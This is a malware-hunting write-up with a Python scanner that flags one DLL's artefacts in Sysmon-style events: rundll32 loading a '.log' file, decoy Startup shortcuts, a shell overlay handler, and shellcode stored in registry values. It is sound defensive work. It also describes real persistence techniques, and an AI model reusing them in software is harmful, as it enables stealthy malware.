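The readable strings in both copies of this DLL give a small set of host artefacts: rundll32.exe run against 8202u39232d.log (a DLL named as a log file), .lnk files dropped into the Startup folder under names like Adobe_FlashUpdate.lnk and Comodo Updated.lnk, a ShellIconOverlayIdentifiers\360UDiskGuard Icon Overlay key with a CLSID InprocServer32 (explorer.exe loads overlay handlers in-process), and values under Software\Google named ShE11C0DE, FileBuf and info each paired with a matching ...Size value. The scanner below is an added example, not code from the contagio post or from the sample, and turns those observations into four checks over Sysmon-style event records. The event records, the HKCU hive for Software\Google, the AppData\Roaming base path and the "InF" export name as written are constructed for the example; the dump does not state them.

```python
r"""Hunt for the loader and persistence artefacts named in the strings dump.

Added example (not code from the contagio post or from the sample).
Checks, over Sysmon-style event dicts:
  1. rundll32 asked to load a module whose extension is not a code
     extension (the dump shows rundll32 "<dir>\8202u39232d.log" ...);
  2. a .lnk written into a Startup folder (Adobe_FlashUpdate.lnk,
     "Comodo Updated.lnk");
  3. a new ShellIconOverlayIdentifiers entry ("360UDiskGuard Icon Overlay");
  4. a registry key holding a value X beside a value XSize
     (ShE11C0DE/ShE11C0DESize, FileBuf/FileBufSize, info/infoSize),
     the shape of a blob stored together with its length.
Hives and base paths below are assumptions for the example.
"""
import ntpath
from collections import defaultdict

CODE_EXTS = {".dll", ".cpl", ".ocx", ".drv", ".ax"}


def split_cmdline(cmd: str):
    """Split a Windows command line on whitespace, honouring double quotes."""
    args, cur, quoted = [], [], False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def rundll32_module(event):
    """Module path rundll32 was asked to load, or None for other images."""
    if ntpath.basename(event.get("image", "")).lower() != "rundll32.exe":
        return None
    args = split_cmdline(event.get("cmdline", ""))
    if len(args) < 2:
        return None
    return args[1].split(",", 1)[0]        # "path,Export" form -> path


def scan(events):
    """Return (rule, detail) findings; per-key checks run after the loop."""
    findings = []
    values_by_key = defaultdict(set)
    for ev in events:
        kind = ev["type"]
        if kind == "ProcessCreate":
            mod = rundll32_module(ev)
            if mod and ntpath.splitext(mod)[1].lower() not in CODE_EXTS:
                findings.append(("rundll32_non_dll_module", mod))
        elif kind == "FileCreate":
            p = ev["path"].lower()
            if p.endswith(".lnk") and "\\start menu\\programs\\startup\\" in p:
                findings.append(("startup_lnk", ev["path"]))
        elif kind == "RegistryValueSet":
            key = ev["key"]
            if "\\shelliconoverlayidentifiers\\" in key.lower():
                findings.append(("shell_overlay_handler", key))
            values_by_key[key].add(ev["value"])
    for key, names in sorted(values_by_key.items()):
        for n in sorted(names):
            if n + "Size" in names:
                findings.append(("registry_blob_with_size", key + "\\" + n))
    return findings


# Constructed events: value and file names from the dump, paths and hives assumed.
EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\u\AppData\Roaming\Sun Orcal\Java\Jre\8202u39232d.log" InF'},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},   # benign
    {"type": "FileCreate",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe_FlashUpdate.lnk"},
    {"type": "FileCreate", "path": r"C:\Users\u\Desktop\notes.lnk"},                 # benign
    {"type": "RegistryValueSet", "key": r"HKCU\Software\Google", "value": "ShE11C0DE"},
    {"type": "RegistryValueSet", "key": r"HKCU\Software\Google", "value": "ShE11C0DESize"},
    {"type": "RegistryValueSet", "key": r"HKCU\Software\Google", "value": "FileBuf"},  # no pair yet
    {"type": "RegistryValueSet",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\360UDiskGuard Icon Overlay",
     "value": "(Default)"},
]

if __name__ == "__main__":
    for rule, detail in scan(EVENTS):
        print(f"{rule:26} {detail}")
```

The first check is the one worth keeping as a standing rule: rundll32.exe will happily load any PE whatever its extension, and a module argument ending in .log, .db or .tmp is almost never legitimate. The overlay-handler check will also fire on genuine installs (cloud-sync clients register these), so treat it as a lead to pair with the InprocServer32 path rather than an alert on its own.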


